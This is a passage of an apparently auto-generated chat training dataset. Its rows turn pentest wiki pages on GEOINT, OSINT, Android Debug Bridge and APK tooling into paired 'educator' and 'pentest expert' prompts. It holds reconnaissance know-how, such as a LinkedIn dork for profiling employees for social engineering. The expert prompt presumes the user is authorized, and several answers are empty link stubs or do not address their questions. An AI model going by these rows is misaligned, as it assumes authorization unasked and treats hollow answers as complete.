flags, and syntax.", "user": "Walk me through GEOINT - Theory", "response": "Geospacial intelligence (GEOINT) is intelligence by analyzing geospacial maps and images about the human activity. This part will present some tools to find and analyze geospacial information. These information could be useful during a Red Team to scout the target's location in order to find building entrances, monitored areas, etc.", "metadata": {"corpus_index": 1574, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe GEOINT - Practice in the context of penetration testing"}, {"role": "assistant", "content": "MAPS\\\nOutdoor geoint:\\\n\\-google.maps\\\n\\-google.earth\\\n\\-yandex maps\\\nAllowed areas for drones:\\\n\\-https://www.drone-spot.tech/carte-des-spots-pour-faire-voler-son-drone.aspx\\\n\\-\n\nIMAGES\\\nFind general metadata:\\\n\\-http://fotoforensics.com\\\nFind metadata + hidden pixels + error level analysis (ELA) + ect..\\\n\\-http://exif.regex.info/exif.cgi\\\n\\-https://29a.ch/photo-forensics\\\nReverse image search:\\\n_**_-https://tineye.com/\\\nSearch for similar images:\\\n\\-https://images.google.com\\\n\\-https://yandex.com/images/\\\nRemove image background:\\\n\\-https://www.remove.bg/\n\n> [!TIP]\n> It is possible to image search within an image using for instance the Bing's tool:\\\n> -https://blogs.bing.com/search-quality-insights/2017-06/beyond-text-queries-searching-with-bing-visual-search\n\n> [!TIP]\n> In a journalistic context it is crucial to verify sources, including images. Here is a guide to verify image's veracity:\\\n> https://firstdraftnews.org/wp-content/uploads/2017/03/FDN_verificationguide_photos.pdf?x40896"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe GEOINT - Practice in the context of penetration testing", "response": "MAPS\\\nOutdoor geoint:\\\n\\-google.maps\\\n\\-google.earth\\\n\\-yandex maps\\\nAllowed areas for drones:\\\n\\-https://www.drone-spot.tech/carte-des-spots-pour-faire-voler-son-drone.aspx\\\n\\-\n\nIMAGES\\\nFind general metadata:\\\n\\-http://fotoforensics.com\\\nFind metadata + hidden pixels + error level analysis (ELA) + ect..\\\n\\-http://exif.regex.info/exif.cgi\\\n\\-https://29a.ch/photo-forensics\\\nReverse image search:\\\n_**_-https://tineye.com/\\\nSearch for similar images:\\\n\\-https://images.google.com\\\n\\-https://yandex.com/images/\\\nRemove image background:\\\n\\-https://www.remove.bg/\n\n> [!TIP]\n> It is possible to image search within an image using for instance the Bing's tool:\\\n> -https://blogs.bing.com/search-quality-insights/2017-06/beyond-text-queries-searching-with-bing-visual-search\n\n> [!TIP]\n> In a journalistic context it is crucial to verify sources, including images. Here is a guide to verify image's veracity:\\\n> https://firstdraftnews.org/wp-content/uploads/2017/03/FDN_verificationguide_photos.pdf?x40896", "metadata": {"corpus_index": 1575, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out GEOINT - Practice during a pentest?"}, {"role": "assistant", "content": "MAPS\\\nOutdoor geoint:\\\n\\-google.maps\\\n\\-google.earth\\\n\\-yandex maps\\\nAllowed areas for drones:\\\n\\-https://www.drone-spot.tech/carte-des-spots-pour-faire-voler-son-drone.aspx\\\n\\-\n\nIMAGES\\\nFind general metadata:\\\n\\-http://fotoforensics.com\\\nFind metadata + hidden pixels + error level analysis (ELA) + ect..\\\n\\-http://exif.regex.info/exif.cgi\\\n\\-https://29a.ch/photo-forensics\\\nReverse image search:\\\n_**_-https://tineye.com/\\\nSearch for similar images:\\\n\\-https://images.google.com\\\n\\-https://yandex.com/images/\\\nRemove image background:\\\n\\-https://www.remove.bg/\n\n> [!TIP]\n> It is possible to image search within an image using for instance the Bing's tool:\\\n> -https://blogs.bing.com/search-quality-insights/2017-06/beyond-text-queries-searching-with-bing-visual-search\n\n> [!TIP]\n> In a journalistic context it is crucial to verify sources, including images. Here is a guide to verify image's veracity:\\\n> https://firstdraftnews.org/wp-content/uploads/2017/03/FDN_verificationguide_photos.pdf?x40896"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out GEOINT - Practice during a pentest?", "response": "MAPS\\\nOutdoor geoint:\\\n\\-google.maps\\\n\\-google.earth\\\n\\-yandex maps\\\nAllowed areas for drones:\\\n\\-https://www.drone-spot.tech/carte-des-spots-pour-faire-voler-son-drone.aspx\\\n\\-\n\nIMAGES\\\nFind general metadata:\\\n\\-http://fotoforensics.com\\\nFind metadata + hidden pixels + error level analysis (ELA) + ect..\\\n\\-http://exif.regex.info/exif.cgi\\\n\\-https://29a.ch/photo-forensics\\\nReverse image search:\\\n_**_-https://tineye.com/\\\nSearch for similar images:\\\n\\-https://images.google.com\\\n\\-https://yandex.com/images/\\\nRemove image background:\\\n\\-https://www.remove.bg/\n\n> [!TIP]\n> It is possible to image search within an image using for instance the Bing's tool:\\\n> -https://blogs.bing.com/search-quality-insights/2017-06/beyond-text-queries-searching-with-bing-visual-search\n\n> [!TIP]\n> In a journalistic context it is crucial to verify sources, including images. Here is a guide to verify image's veracity:\\\n> https://firstdraftnews.org/wp-content/uploads/2017/03/FDN_verificationguide_photos.pdf?x40896", "metadata": {"corpus_index": 1575, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is GEOINT - Sources?"}, {"role": "assistant", "content": "https://github.com/jivoi/awesome-osint#-geospatial-research-and-mapping-tools\n\nhttps://www.bellingcat.com/resources/how-tos/2015/04/24/metadata-metauseful-metacreepy/\n\nhttps://nothing2hide.org/fr/2019-09-18-guide-osint-2019/\n\nhttps://www.bellingcat.com/resources/case-studies/2015/03/03/stunt-geolocation-verifying-the-unverifiable/"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is GEOINT - Sources?", "response": "https://github.com/jivoi/awesome-osint#-geospatial-research-and-mapping-tools\n\nhttps://www.bellingcat.com/resources/how-tos/2015/04/24/metadata-metauseful-metacreepy/\n\nhttps://nothing2hide.org/fr/2019-09-18-guide-osint-2019/\n\nhttps://www.bellingcat.com/resources/case-studies/2015/03/03/stunt-geolocation-verifying-the-unverifiable/", "metadata": {"corpus_index": 1576, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through GEOINT - Sources"}, {"role": "assistant", "content": "https://github.com/jivoi/awesome-osint#-geospatial-research-and-mapping-tools\n\nhttps://www.bellingcat.com/resources/how-tos/2015/04/24/metadata-metauseful-metacreepy/\n\nhttps://nothing2hide.org/fr/2019-09-18-guide-osint-2019/\n\nhttps://www.bellingcat.com/resources/case-studies/2015/03/03/stunt-geolocation-verifying-the-unverifiable/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through GEOINT - Sources", "response": "https://github.com/jivoi/awesome-osint#-geospatial-research-and-mapping-tools\n\nhttps://www.bellingcat.com/resources/how-tos/2015/04/24/metadata-metauseful-metacreepy/\n\nhttps://nothing2hide.org/fr/2019-09-18-guide-osint-2019/\n\nhttps://www.bellingcat.com/resources/case-studies/2015/03/03/stunt-geolocation-verifying-the-unverifiable/", "metadata": {"corpus_index": 1576, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of OSINT - Theory"}, {"role": "assistant", "content": "When it comes to social engineering, gathering information about the target is crucial, especially if you target a specific person.\n\n> If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle. (_Art of war, Sun Tzu_)\n\nIn this part we will see how to get information about people, which could be useful to personalize social engineering attacks to make them more efficient."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of OSINT - Theory", "response": "When it comes to social engineering, gathering information about the target is crucial, especially if you target a specific person.\n\n> If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle. (_Art of war, Sun Tzu_)\n\nIn this part we will see how to get information about people, which could be useful to personalize social engineering attacks to make them more efficient.", "metadata": {"corpus_index": 1577, "category": "web", "source_file": "docs/src/intelligence-gathering/osint.md", "page_title": "OSINT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for OSINT - Theory?"}, {"role": "assistant", "content": "When it comes to social engineering, gathering information about the target is crucial, especially if you target a specific person.\n\n> If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle. (_Art of war, Sun Tzu_)\n\nIn this part we will see how to get information about people, which could be useful to personalize social engineering attacks to make them more efficient."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for OSINT - Theory?", "response": "When it comes to social engineering, gathering information about the target is crucial, especially if you target a specific person.\n\n> If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle. (_Art of war, Sun Tzu_)\n\nIn this part we will see how to get information about people, which could be useful to personalize social engineering attacks to make them more efficient.", "metadata": {"corpus_index": 1577, "category": "web", "source_file": "docs/src/intelligence-gathering/osint.md", "page_title": "OSINT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about OSINT - Practice"}, {"role": "assistant", "content": "General search:\n- \n- Google Dork :\nsite:linkedin.com -inurl:dir \"Company\" \"Name\"\n\nAbout companies:\n- \n- (_France-only_)\n\nEmployee's feedback and information about companies:\n- \n- \n\nTwitter :\n- \n- \n- \n\nSocial networks/medias:\n* Twitter\n* Facebook\n* Instagram\n* Pinterest\n* Reddit\n* VKontakte\n* Tumblr\n* LinkedIn\n* DeviantArt\n* Steam\n\nImage recognition:\n- \n- "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about OSINT - Practice", "response": "General search:\n- \n- Google Dork :\nsite:linkedin.com -inurl:dir \"Company\" \"Name\"\n\nAbout companies:\n- \n- (_France-only_)\n\nEmployee's feedback and information about companies:\n- \n- \n\nTwitter :\n- \n- \n- \n\nSocial networks/medias:\n* Twitter\n* Facebook\n* Instagram\n* Pinterest\n* Reddit\n* VKontakte\n* Tumblr\n* LinkedIn\n* DeviantArt\n* Steam\n\nImage recognition:\n- \n- ", "metadata": {"corpus_index": 1578, "category": "web", "source_file": "docs/src/intelligence-gathering/osint.md", "page_title": "OSINT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out OSINT - Practice during a pentest?"}, {"role": "assistant", "content": "General search:\n- \n- Google Dork :\nsite:linkedin.com -inurl:dir \"Company\" \"Name\"\n\nAbout companies:\n- \n- (_France-only_)\n\nEmployee's feedback and information about companies:\n- \n- \n\nTwitter :\n- \n- \n- \n\nSocial networks/medias:\n* Twitter\n* Facebook\n* Instagram\n* Pinterest\n* Reddit\n* VKontakte\n* Tumblr\n* LinkedIn\n* DeviantArt\n* Steam\n\nImage recognition:\n- \n- "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out OSINT - Practice during a pentest?", "response": "General search:\n- \n- Google Dork :\nsite:linkedin.com -inurl:dir \"Company\" \"Name\"\n\nAbout companies:\n- \n- (_France-only_)\n\nEmployee's feedback and information about companies:\n- \n- \n\nTwitter :\n- \n- \n- \n\nSocial networks/medias:\n* Twitter\n* Facebook\n* Instagram\n* Pinterest\n* Reddit\n* VKontakte\n* Tumblr\n* LinkedIn\n* DeviantArt\n* Steam\n\nImage recognition:\n- \n- ", "metadata": {"corpus_index": 1578, "category": "web", "source_file": "docs/src/intelligence-gathering/osint.md", "page_title": "OSINT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Android Debug Bridge ⚙️ - Theory?"}, {"role": "assistant", "content": "Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Android Debug Bridge ⚙️ - Theory?", "response": "Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.", "metadata": {"corpus_index": 1579, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Android Debug Bridge ⚙️ - Theory"}, {"role": "assistant", "content": "Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Android Debug Bridge ⚙️ - Theory", "response": "Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.", "metadata": {"corpus_index": 1579, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Android Debug Bridge ⚙️ - Practical"}, {"role": "assistant", "content": "| Command | Description |\n| ----------------------- | ------------------------------------------- |\n| adb devices | List connected devices |\n| adb shell | shell on connected phone (then su for root) |\n| adb install \"app.apk\" | install app on your phone |\n| adb backup | backup \\ |\n| adb logcat | logs on your phone |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Android Debug Bridge ⚙️ - Practical", "response": "| Command | Description |\n| ----------------------- | ------------------------------------------- |\n| adb devices | List connected devices |\n| adb shell | shell on connected phone (then su for root) |\n| adb install \"app.apk\" | install app on your phone |\n| adb backup | backup \\ |\n| adb logcat | logs on your phone |", "metadata": {"corpus_index": 1580, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Android Debug Bridge ⚙️ - Practical?"}, {"role": "assistant", "content": "| Command | Description |\n| ----------------------- | ------------------------------------------- |\n| adb devices | List connected devices |\n| adb shell | shell on connected phone (then su for root) |\n| adb install \"app.apk\" | install app on your phone |\n| adb backup | backup \\ |\n| adb logcat | logs on your phone |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Android Debug Bridge ⚙️ - Practical?", "response": "| Command | Description |\n| ----------------------- | ------------------------------------------- |\n| adb devices | List connected devices |\n| adb shell | shell on connected phone (then su for root) |\n| adb install \"app.apk\" | install app on your phone |\n| adb backup | backup \\ |\n| adb logcat | logs on your phone |", "metadata": {"corpus_index": 1580, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Android Debug Bridge ⚙️ - Frequent problems in the context of penetration testing"}, {"role": "assistant", "content": "Sometimes ADB can no longer connect to the mobile. There are several reasons for this."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Android Debug Bridge ⚙️ - Frequent problems in the context of penetration testing", "response": "Sometimes ADB can no longer connect to the mobile. There are several reasons for this.", "metadata": {"corpus_index": 1581, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Android Debug Bridge ⚙️ - Frequent problems"}, {"role": "assistant", "content": "Sometimes ADB can no longer connect to the mobile. There are several reasons for this."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Android Debug Bridge ⚙️ - Frequent problems", "response": "Sometimes ADB can no longer connect to the mobile. There are several reasons for this.", "metadata": {"corpus_index": 1581, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Android Debug Bridge ⚙️ - Make sure Developers options and USB debugging are activated"}, {"role": "assistant", "content": "* Enable Developers options\n\n1. Go to the settings of the Android device. \n2. Go to the system settings. \n3. Go to \"About the phone\". \n4. Tap 7 times \"build number\". \n5. The options for developers appear in the system settings. \n\n* Inside Developers options, enable USB Debugging\n\n> When in doubt, reboot (Confucious)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Android Debug Bridge ⚙️ - Make sure Developers options and USB debugging are activated", "response": "* Enable Developers options\n\n1. Go to the settings of the Android device. \n2. Go to the system settings. \n3. Go to \"About the phone\". \n4. Tap 7 times \"build number\". \n5. The options for developers appear in the system settings. \n\n* Inside Developers options, enable USB Debugging\n\n> When in doubt, reboot (Confucious)", "metadata": {"corpus_index": 1582, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Android Debug Bridge ⚙️ - Make sure Developers options and USB debugging are activated"}, {"role": "assistant", "content": "* Enable Developers options\n\n1. Go to the settings of the Android device. \n2. Go to the system settings. \n3. Go to \"About the phone\". \n4. Tap 7 times \"build number\". \n5. The options for developers appear in the system settings. \n\n* Inside Developers options, enable USB Debugging\n\n> When in doubt, reboot (Confucious)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Android Debug Bridge ⚙️ - Make sure Developers options and USB debugging are activated", "response": "* Enable Developers options\n\n1. Go to the settings of the Android device. \n2. Go to the system settings. \n3. Go to \"About the phone\". \n4. Tap 7 times \"build number\". \n5. The options for developers appear in the system settings. \n\n* Inside Developers options, enable USB Debugging\n\n> When in doubt, reboot (Confucious)", "metadata": {"corpus_index": 1582, "category": "mobile", "source_file": "docs/src/mobile-apps/android/android-debug-bridge.md", "page_title": "Android Debug Bridge ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is APK transform - Theory?"}, {"role": "assistant", "content": "An .APK file (e.g. Android Package) is a compressed collection of files (i.e. a package) for Android. It could be extracted as an regular archive.\n\nA .DEX file (.e.g Dalvik EXecutable) is an executable file saved in a format that contains compiled code that Android systems can run.\n\nWhen auditing an APK, transforming it to human-readable formats is usually required.\n\n* smali and baksmali are DEX assembler and disassembler respectively\n* d2j-dex2jar can be used to convert DEX files to .class files (zipped as .jar)\n* jadx is a DEX to Java decompiler. It can be used in CLI and GUI for producing Java source code out of Android DEX and APK files."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is APK transform - Theory?", "response": "An .APK file (e.g. Android Package) is a compressed collection of files (i.e. a package) for Android. It could be extracted as an regular archive.\n\nA .DEX file (.e.g Dalvik EXecutable) is an executable file saved in a format that contains compiled code that Android systems can run.\n\nWhen auditing an APK, transforming it to human-readable formats is usually required.\n\n* smali and baksmali are DEX assembler and disassembler respectively\n* d2j-dex2jar can be used to convert DEX files to .class files (zipped as .jar)\n* jadx is a DEX to Java decompiler. It can be used in CLI and GUI for producing Java source code out of Android DEX and APK files.", "metadata": {"corpus_index": 1583, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for APK transform - Theory"}, {"role": "assistant", "content": "An .APK file (e.g. Android Package) is a compressed collection of files (i.e. a package) for Android. It could be extracted as an regular archive.\n\nA .DEX file (.e.g Dalvik EXecutable) is an executable file saved in a format that contains compiled code that Android systems can run.\n\nWhen auditing an APK, transforming it to human-readable formats is usually required.\n\n* smali and baksmali are DEX assembler and disassembler respectively\n* d2j-dex2jar can be used to convert DEX files to .class files (zipped as .jar)\n* jadx is a DEX to Java decompiler. It can be used in CLI and GUI for producing Java source code out of Android DEX and APK files."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for APK transform - Theory", "response": "An .APK file (e.g. Android Package) is a compressed collection of files (i.e. a package) for Android. It could be extracted as an regular archive.\n\nA .DEX file (.e.g Dalvik EXecutable) is an executable file saved in a format that contains compiled code that Android systems can run.\n\nWhen auditing an APK, transforming it to human-readable formats is usually required.\n\n* smali and baksmali are DEX assembler and disassembler respectively\n* d2j-dex2jar can be used to convert DEX files to .class files (zipped as .jar)\n* jadx is a DEX to Java decompiler. It can be used in CLI and GUI for producing Java source code out of Android DEX and APK files.", "metadata": {"corpus_index": 1583, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does APK transform - Add Kali repo to your sources work?"}, {"role": "assistant", "content": "``\necho \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update\n`\n\nNote that if you haven’t updated your Kali installation in some time, you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:\n\n`\nwget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does APK transform - Add Kali repo to your sources work?", "response": "``\necho \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update\n`\n\nNote that if you haven’t updated your Kali installation in some time, you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:\n\n`\nwget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n``", "metadata": {"corpus_index": 1584, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through APK transform - Add Kali repo to your sources"}, {"role": "assistant", "content": "``\necho \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update\n`\n\nNote that if you haven’t updated your Kali installation in some time, you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:\n\n`\nwget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through APK transform - Add Kali repo to your sources", "response": "``\necho \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update\n`\n\nNote that if you haven’t updated your Kali installation in some time, you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:\n\n`\nwget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n``", "metadata": {"corpus_index": 1584, "category": "mobile", "source_file": "docs/src/mobile-apps/android/apk-transform.md", "page_title": "APK transform", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the echo syntax for apk transform - add kali repo to your sources?"}, {"role": "assistant", "content": "echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list \n\napt-get update"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the echo syntax for apk transform - add kali repo to your sources?", "response": "echo \"deb http://http.kali.org/kali kali-rolling main contrib 